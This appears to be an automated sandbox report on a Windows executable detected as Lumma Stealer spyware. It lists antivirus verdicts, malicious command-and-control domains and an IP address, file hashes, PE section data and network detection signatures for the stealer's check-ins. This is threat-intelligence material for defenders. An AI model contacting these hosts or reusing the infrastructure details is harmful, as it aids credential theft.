                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Source | Detection | Scanner | Label | Link
                pPizCGDvrx.exe | 58% | ReversingLabs | Win32.Trojan.Symmi |
                pPizCGDvrx.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
                pPizCGDvrx.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://grannyejh.lat/H | 100% | Avira URL Cloud | malware |
                https://grannyejh.lat:443/apitA | 100% | Avira URL Cloud | malware |
                https://grannyejh.lat/s | 100% | Avira URL Cloud | malware |
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | 0% | Avira URL Cloud | safe |
                https://grannyejh.lat/? | 100% | Avira URL Cloud | malware |
                https://grannyejh.lat/apiz0y | 100% | Avira URL Cloud | malware |
                https://grannyejh.lat/apigsA | 100% | Avira URL Cloud | malware |
                https://grannyejh.lat/= | 100% | Avira URL Cloud | malware |
                https://grannyejh.lat/apiz | 100% | Avira URL Cloud | malware |
                https://grannyejh.lat/P | 100% | Avira URL Cloud | malware |
                https://grannyejh.lat/apiG | 100% | Avira URL Cloud | malware |
                https://grannyejh.lat/api6 | 100% | Avira URL Cloud | malware |
                https://grannyejh.lat/( | 100% | Avira URL Cloud | malware |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                grannyejh.lat | 172.67.179.109 | true | false | | high
                sweepyribs.lat | unknown | unknown | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                necklacebudi.lat | false | | high
                aspecteirs.lat | false | | high
                energyaffai.lat | false | | high
                https://grannyejh.lat/api | false | | high
                sweepyribs.lat | false | | high
                sustainskelet.lat | false | | high
                crosshuaht.lat | false | | high
                rapeflowwj.lat | false | | high
                grannyejh.lat | false | | high
                discokeyus.lat | false | | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0 | pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/chrome_newtab | pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://grannyejh.lat:443/apitA | pPizCGDvrx.exe, 00000000.00000003.1755353022.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756627823.00000000011BF000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755109523.00000000011B1000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                https://duckduckgo.com/ac/?q= | pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico | pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://grannyejh.lat/s | pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                https://grannyejh.lat/ | pPizCGDvrx.exe, pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1658536617.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600613999.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756651174.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671282369.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754833970.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603018790.00000000011C2000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600571554.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657853722.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://crl.rootca1.amazontrust.com/rootca1.crl0 | pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://ocsp.rootca1.amazontrust.com0: | pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://grannyejh.lat/H | pPizCGDvrx.exe, 00000000.00000003.1547189267.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671204983.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1546879090.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600571554.00000000011E8000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
                https://www.ecosia.org/newtab/ | pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://grannyejh.lat/? | pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001143000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                https://grannyejh.lat/apigsA | pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                https://grannyejh.lat/= | pPizCGDvrx.exe, 00000000.00000003.1657853722.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                https://ac.ecosia.org/autocomplete?q= | pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://grannyejh.lat/apiz0y | pPizCGDvrx.exe, 00000000.00000002.1756296489.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755223714.0000000001158000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                https://grannyejh.lat:443/api | pPizCGDvrx.exe, 00000000.00000003.1755109523.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657908110.00000000011B1000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://crl.micro | pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755166641.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600613999.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657908110.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755109523.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603058003.00000000011A0000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://x1.c.lencr.org/0 | pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://x1.i.lencr.org/0 | pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://grannyejh.lat/apiz | pPizCGDvrx.exe, 00000000.00000003.1671204983.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://grannyejh.lat/P | pPizCGDvrx.exe, 00000000.00000003.1658536617.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756651174.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671282369.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754833970.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                http://crt.rootca1.amazontrust.com/rootca1.cer0? | pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://grannyejh.lat/api6 | pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u | pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e | pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://grannyejh.lat/( | pPizCGDvrx.exe, 00000000.00000003.1437659594.000000000114B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                https://support.mozilla.org/products/firefoxgro.all | pPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://grannyejh.lat/apiG | pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta | pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmp | false | | high
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                172.67.179.109 | grannyejh.lat | United States | | 13335 | CLOUDFLARENETUS | false
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1577892
                Start date and time: 2024-12-18 21:15:59 +01:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 5m 36s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed: 7
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: pPizCGDvrx.exe (renamed because original name is a hash value)
                Original Sample Name: 604fc7ac851c76b3ade50108357d8134.exe
                Detection: MAL
                Classification: mal100.troj.spyw.evad.winEXE@1/0@2/1
                EGA Information: Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target pPizCGDvrx.exe, PID 7392 because there are no executed function
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: pPizCGDvrx.exe
Time | Type | Description
15:17:00 | API Interceptor | 87x Sleep call for process: pPizCGDvrx.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.179.109 | D2Cw8gWOXj.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
172.67.179.109 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT
172.67.179.109 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc
172.67.179.109 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc
172.67.179.109 | 0Vwp4nJQOc.exe | malicious | LummaC, Stealc
172.67.179.109 | Z1jUFmrTua.exe | malicious | LummaC, Stealc
172.67.179.109 | random.exe.7.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, Vidar
172.67.179.109 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig
172.67.179.109 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig
Match | Associated Sample Name / URL | Detection | Threat Name | Context
grannyejh.lat | D2Cw8gWOXj.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.179.109
grannyejh.lat | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT | 172.67.179.109
grannyejh.lat | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc | 172.67.179.109
grannyejh.lat | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | 172.67.179.109
grannyejh.lat | 0Vwp4nJQOc.exe | malicious | LummaC, Stealc | 172.67.179.109
grannyejh.lat | Lw1k8a7gQu.exe | malicious | LummaC | 104.21.64.80
grannyejh.lat | Z1jUFmrTua.exe | malicious | LummaC, Stealc | 172.67.179.109
grannyejh.lat | random.exe.7.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, Vidar | 172.67.179.109
grannyejh.lat | random.exe.2.exe | malicious | LummaC | 104.21.64.80
grannyejh.lat | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig | 104.21.64.80
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | tasktow.exe | malicious | Unknown | 104.21.1.82
CLOUDFLARENETUS | https://www.asda.com@hnvs.xyz/asda-christmas-prizes | malicious | Unknown | 172.66.47.201
CLOUDFLARENETUS | TUp6f2knn2.exe | malicious | LummaC | 104.21.24.223
CLOUDFLARENETUS | QIo3SytSZA.exe | malicious | Vidar | 172.64.41.3
CLOUDFLARENETUS | Payment_Failure_Notice_Office365_sdf_[13019].html | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | R4qP4YM0QX.lnk | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | D2Cw8gWOXj.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.179.109
CLOUDFLARENETUS | https://vCyA.warmickmak.ru/PrEvJj/ | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | sqJIHyPqhr.exe | malicious | LummaC | 172.67.220.223
CLOUDFLARENETUS | k6A01XaeEn.exe | malicious | LummaC | 104.21.21.99
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | TUp6f2knn2.exe | malicious | LummaC | 172.67.179.109
a0e9f5d64349fb13191bc781f81f42e1 | D2Cw8gWOXj.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.179.109
a0e9f5d64349fb13191bc781f81f42e1 | sqJIHyPqhr.exe | malicious | LummaC | 172.67.179.109
a0e9f5d64349fb13191bc781f81f42e1 | k6A01XaeEn.exe | malicious | LummaC | 172.67.179.109
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT | 172.67.179.109
a0e9f5d64349fb13191bc781f81f42e1 | 'Setup.exe | malicious | LummaC Stealer | 172.67.179.109
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC | 172.67.179.109
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc | 172.67.179.109
a0e9f5d64349fb13191bc781f81f42e1 | F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 172.67.179.109
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948078874388594
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: pPizCGDvrx.exe
File size: 1'871'360 bytes
MD5: 604fc7ac851c76b3ade50108357d8134
SHA1: e8e5229df293646aed1a46d5a7d7983eb1f2eb47
SHA256: a16f254d7b7ede78b181d541cf02de244472f59f18ea3c8e6ef63d869736cb93
SHA512: 46e45a2584f2f0c497f4ad63e03078a8a1f9c21012c273ecc1f131a1436f5883c89e6db6ee5e512b39fcec688731924a12f0e13abd8c2b18ea525b565561a1a0
SSDEEP: 49152:rowO3hXz+/Nub30pLQv04cl/SrtHh5fB319MP+KmE64zrlS:rot3t+/gjcg046SxJ19M2OHlS
TLSH: DD85334BD062EC94E76ECE31A94B23778FA2B58402C3EDB2944C6295877F7EA55F4300
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@.......................... J......W....@.................................T0..h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x89f000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F2A2D061D2Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
| 0x1000 | 0x51000 | 0x24800 | 4924f3feadfedbeb2dc01ccecc383d3a | False | 0.9974114404965754 | data | 7.978884009645504 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x52000 | 0x2b0 | 0x400 | b1e85b1cd09caefc2d43268be72ef161 | False | 0.3603515625 | data | 5.183452444303608 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
| 0x54000 | 0x2a9000 | 0x200 | d1eaaabaf13849ba2d492f46d3dd09ad | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iottbtod | 0x2fd000 | 0x1a1000 | 0x1a0800 | 8e695e9e3b9eda276f58b4e868d018e8 | False | 0.9948973730117047 | data | 7.953350662894027 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ugfsaeak | 0x49e000 | 0x1000 | 0x400 | cb73c94c8c51ec6b39a40719d8546401 | False | 0.7451171875 | data | 5.890573657276491 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x49f000 | 0x3000 | 0x2200 | 8557a0e6c2d451755e8e53b2c94eddc6 | False | 0.06376378676470588 | DOS executable (COM) | 0.6422367121829815 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x52058 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T21:17:00.797972+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.7 | 64749 | 1.1.1.1 | 53 | UDP
2024-12-18T21:17:00.944390+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.7 | 64619 | 1.1.1.1 | 53 | UDP
2024-12-18T21:17:02.473914+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.7 | 49700 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:02.473914+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49700 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:05.699877+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49700 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:05.699877+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49700 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:06.952490+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.7 | 49702 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:06.952490+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49702 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:12.833580+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49702 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:12.833580+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49702 | 172.67.179.109 | 443 | TCP
2024-12-18T21:17:14.417710+0100 | 2058365 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) | 1 | 192.168.2.7 | 49723 | 172.67.179.109 | 443 | TCP
